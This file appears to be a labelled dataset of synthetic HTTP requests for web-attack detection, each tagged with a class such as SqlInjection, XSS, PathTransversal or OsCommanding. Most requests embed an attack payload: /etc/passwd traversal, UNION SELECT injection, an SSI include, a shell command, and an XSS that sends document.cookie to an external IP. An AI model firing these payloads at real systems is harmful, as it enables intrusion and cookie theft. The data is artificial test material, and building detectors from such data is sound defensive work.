Proxy-Authorization: Digest algorithm=ohi4
Authorization: Digest uri=http://www.aeed.net/2toh/ctezt.mpeg
Range: -23,7962-,63876-540949
Referer: /tcialien.css
TE: trailers,gzip;q=0.2
Trailer: Warning
User-Agent: Mozilla/6.3 (Machintosh; U; PPC 0.8; ol-cy; rv:1.9.5) Gecko/34760790
UA-CPU: x86
UA-Disp: 8084,8855,16
UA-OS: Win98
UA-Color: color8
Via: FTP/6.1 50.246.134.210, 8.0 80.80.231.46:6, 4.9 172.134.189.2:0
Transfer-Encoding: compress
Upgrade: drf/1.3, eoe/9.9
Warning: 016 www.lea2ce.html "yMifIhorneae" 
X-Forwarded-For: 150.175.159.37
X-Serial-Number: 49844
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45469
Start - Id: 49115
class: XPathInjection
GET /I7GJQGMTQUYi6R/deVx1O/crahddtz9eeBsa/yFOcz9WrOF/dslwG0ed34/b1pLBj3OZt5abckcboIt/aF9xz2T/kcerTphti/LFWOGGVtb/yNh8_8C3QRdgd/6indoroemtNfh/i7HnIVe@vJ5B30.php?nex=967734870&epnrxesSahnBtyt=0gstancesits&ooe9enxtovt=355+++or++1%3C++++eI0ut%2Fhw%2FeRxtoi%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D97%5D++or++++053%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27&tfn5=eeo&ldco=a5qeca&catlsqowy=foysb HTTP/1.1
Host: www.emoaN.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: x-mac-chinesetrad;q=0.0, windows-1252;q=0.1, iso-8859-15, x-mac-chinesetrad;q=0.4
Accept-Encoding: 
Accept-Language: a-mb, iwbsr-Fedfm;q=0.8, b-motdslu;q=0.9, Iu-1i
Cache-Control: max-stale
Client-ip: 140.0.134.125
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sun, 29 Feb 04 03:00:57 CET
ETag: "vzdQL-TvdBmv@UeHw"
Expect: htduh=nedueein;lnyke
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 25 Jul 06 24:01:13 UTC
If-Unmodified-Since: Fri, 01 Jan 10 21:01:04 GMT
If-Match: "fKYBCvbJeO8B1QXb2Q@x"
If-None-Match: "Vo3O4eVy-ay8yAC8cR1"
If-Range: Fri, 12 Jan 07 11:01:56 GMT
Max-Forwards: 03
MIME-Version: 8.7
Pragma: haOIrmcn=d
Proxy-Authorization: Digest nonce
Authorization: Digest username="bddthp"
Range: 1-
Referer: http://www.th4aoe3b.st/eylLT8He/qiltm/sieaela0/oj6o2pdy/3tebrso.mp3
TE: chunked;q=0.3,trailers,deflate;q=0.5
Trailer: Referer
User-Agent: elnpnis/3.4.5
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: identity
Upgrade: rlace/3.0, hoSa/9.4, jas/6.6, iAeed/2.7
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49115
Start - Id: 35447
class: SqlInjection
PUT /CmXXTvxzC7_/nYpYBCB83/st3H/9O4tgeS.dll? HTTP/1.1
Content-Length: 33
Content-Language: vuucsa,uamlbi
Content-Encoding: identity
Content-Location: /2d8zrnr/SdkeIe/d9rih.sh
Content-MD5: bG95MHRjaGFhbnRvZDJlbA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Wed, 30 Nov 05 18:19:43 GMT
Host: 254.56.151.186
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-874, windows-874;q=0.5
Accept-Encoding: *
Accept-Language: ' )  UNION  ALL     SELECT   wIacpd    FROM     062yAf     WHERE   (    ''    =  '
Cache-Control: max-stale=1
Client-ip: 112.6.250.109
Cookie: dehiYuhi=6785208;ChxAet1mr=hem
Cookie2: $Version="506"
Date: Fri, 12 Dec 08 13:48:49 CET
ETag: W/"ypygGJXJUUoEf@D"
From: adnsm@M3eOy0te.org
If-Modified-Since: Thu, 29 Jun 06 09:20:38 UTC
If-Match: "4TZ77ZbAXn7_R@0Az1o"
If-None-Match: *
If-Range: Tue, 01 Jun 04 23:56:17 CET
Max-Forwards: 523
MIME-Version: 0.0
Pragma: tn=a
Proxy-Authorization: MdDiR TbitO=rktw
Authorization: Digest algorithm=MD5
Range: 8-,99-3,-630
Referer: /lFetspc/rrqerwm/t4e2vrsh.rar
TE: trailers,chunked;q=0.5,chunked
User-Agent: ehrrt/3.0.1.2.9
UA-CPU: 68000
UA-Disp: 866,8235,16
Via: FTP/8.9 181.196.187.75, FTP/1.9 www.2aos.jpg, HTTP/0.7 www.tfsg.jpeg
Transfer-Encoding: deflate
X-Forwarded-For: 88.8.97.255
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

pl=new4He&deeAsirDm=gLromhathdqmm

End - Id: 35447
Start - Id: 45017
class: PathTransversal
PUT /j0sxebinYN/vNI-c6/sU1Hx0nlDX/roicneojdssn8o/tYLrkmCI6m./sehrfqpTha.php? HTTP/1.0
Content-Length: 123
Content-Language: rai0,ymh2ube
Content-Encoding: gzip
Content-Location: http://www.beet.biz/0alvwon.php
Content-MD5: V2hpVGVlcm9iYTluaXlpcg==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Mon, 27 Mar 06 17:58:54 CET
Host: 139.208.24.107
Connection: CsItimta
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: a-fhndtew
Cache-Control: tosel3=mdrhi
Cookie: Apassthru5.kTCgg=djtteed1ea;niq5iurcnl0rsen=2028;Rpqnayd87um9d=a61nusIv;NVQE1f07XmZ=ssstTrcc5n5g;JnJbmetas5WRJ=documentz|@
Cookie2: $Version="746"
Date: Wed, 26 Oct 05 19:57:46 UTC
ETag: "U_ur8zwGDcFU9al"
Expect: drto
If-Match: *
If-Range: "xY9yxcI93ZGE-5ve0M"
Max-Forwards: 9596
Pragma: no-cache
Range: 1-,899478-
Referer: http://aejVf.ch/mesto/otst7ga/d4bu3nsw/aesttu/qmha.zip
TE: gzip
User-Agent: /./../../.././../.././../.././../../../
UA-OS: FreeBSD
Via: HTTP/9.3 98.131.3.37, 8.7 www.rnceoe.png
Transfer-Encoding: gSlu; caeotet=hopog
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

a8nrqioe=mno tnetcatincludettA=s[twOre8&udMsH5N8hestA=ngtoh&U8Si2Hb=Redaogzx8hddttEras&2M8access_logeG-9u3F=Nn&3h4i=483

End - Id: 45017
Start - Id: 46389
class: PathTransversal
GET /ii7/eti3J_nKljrE97LAw/0etsCis2knscgihyhaPi/w7FMvRdmGf.shtml?Rsle=clyie&essn=97229&hI3EocHotcO=Esevbscriptsv%3C%5CtuArh&aaeihia9urht=3mxardc&st=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&iinezn=ruO%2Fd HTTP/1.1
Host: 74.79.103.85:9
Connection: alxm
Accept: */*;q=0.9
Accept-Charset: windows-1253, windows-1253;q=0.6, isiri-3342;q=0.1, x-mac-ce;q=0.4, utf-8
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.8
Cache-Control: min-fresh=682
Client-ip: 230.204.6.13
Cookie: d2rgi4A3d=eoe?;iern0st=U9t;9jD4uHbyA=uDi.z2.tfdx
Cookie2: $Version="1"
Date: Fri, 25 Jan 08 18:57:30 GMT
ETag: "zbda8zsKQwnU19r"
Expect: 100-continue
From: ladasd@didtoeUsr.uk
If-Modified-Since: Fri, 16 Jul 04 01:14:50 UTC
If-Unmodified-Since: Sun, 22 Aug 04 09:23:32 UTC
If-Match: "-5G43@R4xEAX8Ap"
If-None-Match: "6wBD17ZQ.106b2-"
If-Range: Wed, 21 Jan 09 24:46:36 GMT
Max-Forwards: 5
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: Digest qop=la8es
Range: 1-64988,874604-47420,9842-4
Referer: /nntceui/gleeO/dEorSu.aspx
TE: deflate,chunked
Trailer: Cache-Control
User-Agent: nrMBa6m.A http://www.sttssl.st
UA-CPU: MIPS
UA-Disp: 637,7292,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 3216x516
Via: 5.8 www.Naoc.tiff
Transfer-Encoding: gzip
Upgrade: nri/5.0, rree/0.5, msno/4.0
Warning: 191 www.ts61.gif "suticae" 
X-Forwarded-For: 241.79.66.180
X-Serial-Number: 0730634231485
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46389
Start - Id: 47479
class: XSS
GET /8aXS/AudiW@BiHjt4position/hsehRdoasCs/Uaccess_logB9.gif?tcjf=96&BChPOM=2adminLctge6%7C&awaodVdR=tpbuvTfcsnrnciu&nae=ndhanneel&7o=%3Cdiv+style+++%3D+++%22binding%3A+++++url%28%5Bhttp%3A%2F%2Fwww.asgear.com%2Fscript%2F5teme0blh.php4%5D%29%3B+++++%22%3E&ncrhlgguetr1wt=innobgsoundoee%27tmpr+%27rdq&9m6H6OHJp=%29ooc&dReLum3=biN%3EIEt HTTP/1.0
Host: 87.191.152.205
Connection: keep-alive
Accept: application/rtf;q=0.3, application/postscript, text/*;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.8, identity;q=0.1, identity, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 205.71.159.23
Cookie: R-58object=gC@MJ2;disetonzssa=iiifmno/ssTect
Cookie2: $Version="8"
Date: Wed, 24 Dec 08 09:51:06 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 12 Dec 05 12:32:05 GMT
If-Unmodified-Since: Fri, 20 Feb 04 13:52:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 11 Jan 09 14:45:08 UTC
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: /8hCdo7/moijcyj/yte23rto.jpg
TE: trailers,trailers
Trailer: Authorization
User-Agent: akuy0t (bIS6kKHs1w; vkIsxBw)
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: FTP/6.0 135.53.135.186
Transfer-Encoding: CNRcI; teee=segcn0ot
Upgrade: oRe/6.0, mo1/5.0, epS/1.1, rTdr/5.1
Warning: 265 126.167.150.154 "eE3Hb" "Thu, 11 Oct 07 04:38:57 UTC"
X-Forwarded-For: 162.199.201.1
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47479
Start - Id: 48305
class: XPathInjection
GET /vE2oIe/dtksSnlsnfAa/nWnFU/f6eVyq@2VxcMz/NZ-@ULLnetcat1/lsStEioGecgjeestxr3i/rN2s6zKtTj6WlKput_aP/Na5kb0aoi/n2ydneegtd.htm?i8=2049858281&gLa=7614431370&isze=6&Elosn=o8lhaccess_logeo-o&sstae9goketXn2=E%3D&3nrtsgarmheeae=mt0location HTTP/1.0
Host: 244.167.4.218
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: oAi='ye'
Client-ip: 95.235.160.12
Cookie: txuh0=twu2ilm;tqs=>Dse\;uRn=7
Cookie2: $Version="584"
Date: Sat, 10 Jul 04 21:36:17 CET
ETag: "eerlUYtS7n--gSm11ozn"
Expect: preieae1=rrnnt7r
From: eoohueg@assyib.com
If-Modified-Since: Mon, 27 Nov 06 16:52:49 GMT
If-Unmodified-Since: Wed, 16 Jul 08 09:22:58 UTC
If-Match: "HX3loz.1Bh8DPH5RPH"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 6.0
Pragma: edgh='awAsmtn'
Proxy-Authorization: Digest nonce
Authorization: Digest realm
Referer: /7s9ttm9/0sdmtuus.jsp
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: eArIchme'  or     chesap/6epF/child::node()[processing-instruction()=903]  or   'ngaixTha'   =    '
UA-Disp: 296,6544,16
UA-Pixels: 433x249
Via: 3.9 41.45.211.226, 3.6 113.101.31.141:24, FTP/9.7 www.oodl4nr.js:350
Transfer-Encoding: tsaepc
Upgrade: rkeue/0.5, esr10/3.0, 1eda/2.9, seo/9.6, 7lh/2.5
Warning: 302 12.139.124.62 "qfuhcmikee7d" 
X-Forwarded-For: 49.73.220.16
X-Serial-Number: 17618194843
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48305
Start - Id: 47777
class: XSS
GET /sePV/vohhains/a2/tcS/vCMjWVLk-/giK.@osOol866v4X8-tP/weg/9EOaii7ohgo2Yu/ilr.shtml?h8s=i%28o9hul%5B1%5Crtrqoh4imgf&DSttcieo=ocl&gsolx=e8oaacceptfoeasi+eh&eai=92362411&eoiOgeldmaqy2t=xe7ts0oSethilee&see3SatuiOhT6t=en7nos&rxYTJ5HUom=%3Cdiv+++++style%3D+%22++width%3A++++expression%28%5Bwindow.open%28%27http%3A%2F%2F87.124.210.0%2Fro.sh%27%2Bdocument.cookie%29%3B%5D%29%3B%22+%3E&faejsfieetoowbs=M&0RCXtnR=dl4avt2e&NLyc=drbozeesu6&8timnIh=efnqat HTTP/1.1
Host: 68.150.246.181:80
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.1, video/quicktime
Accept-Charset: euc-tw
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 225.168.147.79
Cookie: rDsoeneo=6;hn=oUw1m
Cookie2: $Version="49"
Date: Mon, 16 Mar 09 07:10:12 CET
ETag: "je8fephf4ma2RiJO"
Expect: tese=ojdN1;xeEsf
From: ychumrg@eeAsehi.cz
If-Modified-Since: Wed, 08 Sep 04 05:28:35 GMT
If-Unmodified-Since: Thu, 03 Dec 09 20:04:53 GMT
If-Match: "RoRP6P46gnywWNY.S"
If-None-Match: *
If-Range: Fri, 09 May 08 03:24:48 GMT
Max-Forwards: 48
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: ynhmte fnet1=f4tno
Authorization: Basic bWVDZVR6azpuamlycw==
Range: 2672-661117
Referer: /idnnsyeA/IhlLa2/hh1qooj/roqwhe.exe
TE: chunked,deflate;q=0.4,deflate
Trailer: Accept-Language
User-Agent: Mozilla/1.6 (compatible; Konqueror/9.8; Linux i586; niEugtu; sqbbedgSu)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2539x540
Via: HTTP/8.5 102.113.247.240, HTTP/3.9 www.tszqtl.gif, FTP/8.5 244.191.101.15
Transfer-Encoding: identity
Upgrade: ioe/1.5, oaei/8.3, ehtv/0.6
Warning: 289 www.y4tieh.html:6480 "Sn3nNaak3avt" "Sun, 06 Sep 09 14:49:12 CET"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47777
Start - Id: 38293
class: LdapInjection
GET /nCY/rDrhnlEsfndihqILhxs/cl/5zwIAJ7iT883R/hsaci5Rcfghom/oeozsey/mF9x2Ts7mKJkJp/UfA-UFG.shtml?Dasr=1moncKanignagavD&y4rns=n&ftpP3psGUXJgD=s&ep17up6n=a&atbla=bsee0bcioeiUebw&ewsy3tlhoo4bi=ar&wTZ3ByG8e=oki%29%28+%7C+++%28nrn9%3D*%29&neefh7nrataO27=hA_SePNAQnx&entliApnteied=4904&eolwt=i%294pseousr9o7otn3dmlei&Wiyope2oNrofrdh=eWZIA&aHtekAcmeth=%27ncopybin%7Ebin%2Fmxcssem%3Ataipo&ifJDvpMA=025574&weT=oi&arosmf=55682 HTTP/1.1
Host: www.dh6E7e.de
Connection: auiIpda
Accept: */*;q=0.3
Accept-Charset: euc-cn;q=0.3
Accept-Encoding: 
Accept-Language: ae-7ssOo, oSoutu-it4h, hg-prHfme
Cache-Control: min-fresh=3
Client-ip: 29.13.37.141
Cookie: juys2=fielRns7nEla;K_Z2=hfeat;gmwpenlsh9=jhhtpass>n%;9a04ebilin5p=73529101;odld=3mmuMqY5@
Cookie2: $Version="436"
Date: Wed, 30 Jun 04 13:17:56 CET
ETag: W/"Bq3JVGm2RGFCrlvj"
Expect: 100-continue
From: deosTn4@ntarwtzGa.ch
If-Modified-Since: Thu, 15 Apr 10 22:22:23 GMT
If-Unmodified-Since: Fri, 20 Jun 08 21:41:19 CET
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Apr 09 15:08:44 GMT
Max-Forwards: 322
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest username="xipatefi"
Authorization: Basic bWxnSDA6dHRlZWVlaWg=
Range: 6717-,60-,18458-657
Referer: http://qk7hs9C.com/zrct/2rhorioe/ogIgneS/TrrEnt/iei8ks.css
TE: deflate;q=0.5,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.0 (Machintosh; U; PPC Mac OS X 1.0; id-86; rv:6.7.8) Gecko/83315559
UA-CPU: MIPS
UA-Disp: 059,0810,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 205x286
Via: 8.4 www.5foeno.html:3, HTTP/0.6 157.33.222.250, FTP/1.5 www.kAder.html:511
Transfer-Encoding: deflate
Upgrade: segoo/3.8
Warning: 579 www.htehr.shtml:7460 "fyeYeyiN4nSSEx4" 
X-Forwarded-For: 36.212.4.168
X-Serial-Number: 055236562928
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38293
Start - Id: 46003
class: PathTransversal
PUT /e7w6l8niioa6tt1/oI6zyioloyht9sbwa/zcV7@r9Qg.mspx? HTTP/1.0
Content-Length: 289
Content-Language: oeh,sai
Content-Encoding: compress
Content-Location: http://www.99Hsw.net/tennymds.wav
Content-MD5: bGFuYmtsY2V0YW9vdGVUYw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jun 06 05:40:35 CET
Last-Modified: Sat, 12 Dec 09 04:39:05 UTC
Host: 162.95.57.38
Connection: close
Accept: text/*;q=0.1
Accept-Charset: iso-8859-5, utf-7;q=0.6, x-mac-icelandic;q=0.9
Accept-Encoding: 
Accept-Language: t-ecdo;q=0.4
Cache-Control: w6m9w=nlumse
Cookie: dodn3=../../../../../../../../../WINDOWS/autoexec.bat
Cookie2: $Version="120"
Date: Fri, 17 Dec 04 16:29:54 UTC
Expect: 100-continue
From: tKcUisc@antaldEso0.cz
If-Modified-Since: Tue, 29 Aug 06 17:10:19 UTC
If-Match: *
Max-Forwards: 8
Pragma: wy=oNsu
Proxy-Authorization: Digest algorithm=tcHer
Authorization: Basic eEVlblduZTprcWpyOXQ=
Referer: http://www.Eoett.fr/oureiy/9isk/eonlerk.mdb
Trailer: Pragma
User-Agent: sianEmp (rSTfu_5RzV; opJG.W7Y; u7_zu8Wdu; v2Ql_frATd)
UA-OS: Win98
UA-Color: color8
Via: 5.2 57.251.55.103, 5.0 149.232.30.167:7657
Transfer-Encoding: gzip

vttos8vtlintn=potand&ea=0507319&wdeaPhceuita=lj4sar&tacl=~efm&r0ohme5fa=ieiframesystemPrt&wtql=30&acmssp=2881&lN=f4trs o( Lmstoreplacewi&Zn9w9Er-likeatB=)estdinem m1pEnlike&l.fromOyFdiv_libC9m=54&U4UTuRlrHca=ub0ADksq2r&7fae=095&birUdc=Egrttretj2ci&NNjspHe=ertld&iadiinbonnIirw=t4w@

End - Id: 46003
Start - Id: 35681
class: XPathInjection
GET /oVhRy0gyeRo71ifx3/u578g8.tpm/hetnrmrpScNm8u8ga7jd/iwRja8@joFTghp/pae2Wh2i5H.asp?srnnptTne=e%3Chfi9%24hJ%3Bo+xE&1CqKHIR8=curadhmcYldi&4enam70iE5fh=Amt&aa=9462+++++or+++1%3C++wmx8%2FV8ql%2FTp%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D8%5D++or+89917%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: 48.15.209.56
Connection: keep-alive
Accept: text/plain;q=0.6, application/rtf
Accept-Charset: windows-1250, hz-gb-2312, cp-950, windows-1250;q=0.5
Accept-Encoding: 
Accept-Language: att-sthl, ge-fh6;q=0.8
Cache-Control: no-cache
Client-ip: 68.97.141.43
Cookie: 1gpUl9_WetcX=2345126810;ghjLVdelete=h:etfttoatmochaceoounionh;bses=7;oeoee=d6S3+;aiIgmtctgehtaix=t.Cl405fzD
Cookie2: $Version="063"
Date: Fri, 27 Jul 07 18:31:26 UTC
ETag: "isp-3O2gHWlDZdaAXSs"
Expect: Ezeho=Os1tt1;mhmA=nsgneoa
From: tgaZ6rhn@dneNoaa.uk
If-Modified-Since: Thu, 19 Jan 06 16:20:10 GMT
If-Unmodified-Since: Thu, 30 Sep 04 09:19:58 GMT
If-Match: "6Zc0t_nb7p0vZsKvoUtM"
If-None-Match: "@R3@SD-B85ptV0lMdYu"
If-Range: *
Max-Forwards: 6429
MIME-Version: 5.4
Pragma: no-cache
Proxy-Authorization: Digest username="tghlh"
Authorization: NTLM aHRlZ2VLaGFyd2F3ZHNyaWVjZXJvc050NXRmbXRodXZFcExueGJld3lrbnJlc24=
Range: -82,-22
Referer: /lxxo/es7r3/hfeypb2g/aaii2c/LdSNe3s.sh
TE: chunked;q=0.2,chunked;q=0.6,trailers
Trailer: From
User-Agent: lq96rS7D/3.6.9
UA-CPU: x86
UA-Disp: 466,505,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 2667x788
Via: 7.0 36.212.132.246
Transfer-Encoding: albn; mniyi=enrne
Upgrade: pnarot/3.1, 7tgym/1.5
Warning: 134 179.206.30.120 "oxtqt" "Tue, 25 Sep 07 03:29:34 CET"
X-Forwarded-For: 214.86.27.10
X-Serial-Number: 727389738621693748
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35681
Start - Id: 39514
class: SSI
GET /rWCRvX42xZ/U4uynizi/53jBr78tz9tutGiCQqpI/hG9o1y@aq5vdr-4/g.B7.sh?1skohhoshbol=aetrcis&vnOaV8lLNOr=xtyaZH HTTP/1.1
Host: 193.223.175.196:8906
Connection: keep-alive
Accept: audio/*;q=0.2, text/*
Accept-Charset: *;q=0.3
Accept-Language: <!--     #include   virtual="/etc/httpd/httpd.conf" -->
Date: Sat, 14 Oct 06 08:24:15 UTC
ETag: W/"y_v@qo@HC_yU4W81g_a3"
Expect: 100-continue
If-Match: *
Max-Forwards: 1559
Authorization: NTLM aWVlZGVobmNzYTMzYWhtaWhMZFlnTW9lb2Vvc2lybXJlb05IZQ==
Referer: /gcbs.swf
User-Agent: Mozilla/9.8 (Machintosh; U; Mac OS X 3.1; tr-ss; rv:1.5.1) Gecko/59388408
UA-OS: Linux
Transfer-Encoding: compress

null

End - Id: 39514
Start - Id: 47443
class: XSS
GET /d6yQNXu450ycvts/mSTmXxW5O/c7xSDilBoKuau/0triornAer8tnof7imau/jejscriptW-psx@vartmpto/3cmeeoso1meihFat/lmukImtlro/1NXTI-P@/dr_yL4X/dY-8Nv@mvi0.png?7HMuvO0auyN=86903931&taekigK5bsi=eMsaYtUA&GuoaeevuestRhm=847610&icConiade=tA8e&finsertprocessing-instructionjhavingyjq2=e%40GzHJrrW&syi0odhlmat=%3Ca+++href+%3D+++%22++about%3A%3Cs%26%2399%3Bript%3E%5Balert++%28%27dnnad8y%27%29%3B%5D%3C%2Fscript+%3E++%22++%3E&ovZ5ZssCDKA=awsmochapAe&at9=3315&Rs=omws&ZjEgE=ewtt HTTP/1.1
Host: www.a6gaL7.st:09
Connection: keep-alive
Accept: text/plain;q=0.4
Accept-Charset: windows-1252, big5;q=0.1, iso-8859-6;q=0.9, x-mac-turkish;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: daaqop=elti8dac
Client-ip: 33.233.160.141
Cookie: iesuil8hr=autoexecnode;owadaiibLmc1xb=rrjIG@;in=ejnwbgtnddsDmtdj;group by7o6hIoGlsX=ga5enetkowe2;negoihfuS=86772
Cookie2: $Version="05"
Date: Fri, 23 Feb 07 17:13:00 GMT
ETag: W/"USbOQLZFotY12CP"
Expect: emr8ts
From: eskhrz@f8eyrrtmw.biz
If-Modified-Since: Fri, 01 Oct 04 10:54:28 UTC
If-Unmodified-Since: Tue, 10 Feb 09 14:23:35 GMT
If-Match: "mpKmDbfgvw6V4BN6t1"
If-None-Match: "-K3tYlddQN9Sdhz7L"
If-Range: *
Max-Forwards: 937
MIME-Version: 2.5
Pragma: ss4ti0u=eplapAi3
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM SGVlaWl0eXR0aGlhMHBvZTVDYW1vb3VyY2FwNTZ0dE9Jc3ljbHp0cm55aWl5YWVz
Range: 13744-31405
Referer: /jccS/ntt4.jpeg
TE: deflate;q=0.2,deflate
Trailer: If-Range
User-Agent: Mozilla/7.6 (X11; U; Open BSD i586 2.7; ie-gw; rv:1.2.4) Gecko/03226928
UA-CPU: MIPS
UA-Disp: 1377,371,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 644x740
Via: 0.1 www.nstlee.shtml
Transfer-Encoding: ceura; jeMtnp=eedt0lN
Upgrade: ipodo/1.3, Abos/3.0, rwucs/0.4, xtsw4a/6.8
Warning: 281 www.x8r0s.tiff "js1edtagecg" "Sat, 28 Jul 07 11:01:34 UTC"
X-Forwarded-For: 217.98.75.84
X-Serial-Number: 226091720709125
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 47443
Start - Id: 43396
class: OsCommanding
GET /osDvmrNusshs5eexsIa/Zj5ureplaceb4lpwget/knr/eOoNNGf6jzn/B77YX7/ryrtcnt0urretopoha/vt/oMEieItPtVS8a.iwU6w/sfN3iKOgna.pl?iI7ipinycseanse=evdJhrAhulsdt+R&dTMJbmhWO5=%27++++%3B+++ps++-aux++%3B&ercu3Ahcte=uElK0gCCJHi&Z5buRt=seEu&ri4et6s=6rh9rVspe HTTP/1.1
Host: www.gaCh.cz
Connection: 6uOz
Accept: */*
Accept-Charset: cp-950;q=0.6, koi8;q=0.5, hz-gb-2312, shift_jis;q=0.4
Accept-Encoding: compress;q=0.4
Accept-Language: slctnkaa-I;q=0.9, u-wtkol;q=0.4, h-s;q=0.1, iteamSd-qeel7te
Cache-Control: only-if-cached
Client-ip: 143.76.65.70
Cookie: Blt=san:eeeif:oeoo;eentzaepc2=etifh
Cookie2: $Version="5"
Date: Sat, 19 May 07 18:13:36 UTC
ETag: W/"AMQ50BgW5OZswZc"
Expect: 100-continue
From: su7olsim@shSdnne.cz
If-Modified-Since: Wed, 22 Feb 06 21:34:39 CET
If-Unmodified-Since: Sun, 15 Nov 09 08:33:03 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic dXNTYmEwOmVlc2g2
Authorization: Digest nonce
Range: -4315,8885-439,063-
Referer: http://ehwIt3yv.net/ieeyt/e2saonm5/iehasttm/Hash.swf
TE: trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/2.9 (X11; U; Linux i586 9.2; ds-ih; rv:4.2.4) Gecko/12801275
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9788x122
Via: FTP/5.0 84.218.27.189
Transfer-Encoding: gzip
Upgrade: 37mj/0.5, lgeOa/4.4, ot2tcN/1.9, rat/6.0, EpB/9.2
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43396
Start - Id: 41589
class: SqlInjection
GET /rBs3zzNicteee/tZvpxKaKwOAXSM/tBwA5u5cO0igpELf3hrw/3Muar5.asmx?AQb.1Khtpass=%3B++select+*+from++++OPENROWSET%28+%27SQLoledb%27%2C%27uid%3DNeipvx23T%3Bpwd%3Dotor8eex%3BNetwork%3DDBMSSOCN%3BAddress%3D126.42.75.244%2C31897%3B%27%2C%27select+++++*+++from+4d%27%29&Keg=eVMuMQN%40S&nniae8loe1u8tdn=96613231&t2sysnrrouco=livr&3@dSz=iiO&aeaanis=8720&bueSrhnoaDn=z&aixewea=+WOTtO6r HTTP/1.1
Host: www.ens7a.be
Connection: close
Accept: audio/*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate;q=0.2, gzip;q=0.9, gzip;q=0.8
Accept-Language: eTapotei-ltShas
Cache-Control: only-if-cached
Client-ip: 38.173.11.46
Cookie: eo=i2P-UuvC_H
Cookie2: $Version="8"
Date: Fri, 06 Mar 09 06:32:26 CET
ETag: W/"W0@RJky9TsVAqhWET"
Expect: 100-continue
From: xwfji@6eera.be
If-Modified-Since: Tue, 13 Jul 04 16:18:48 CET
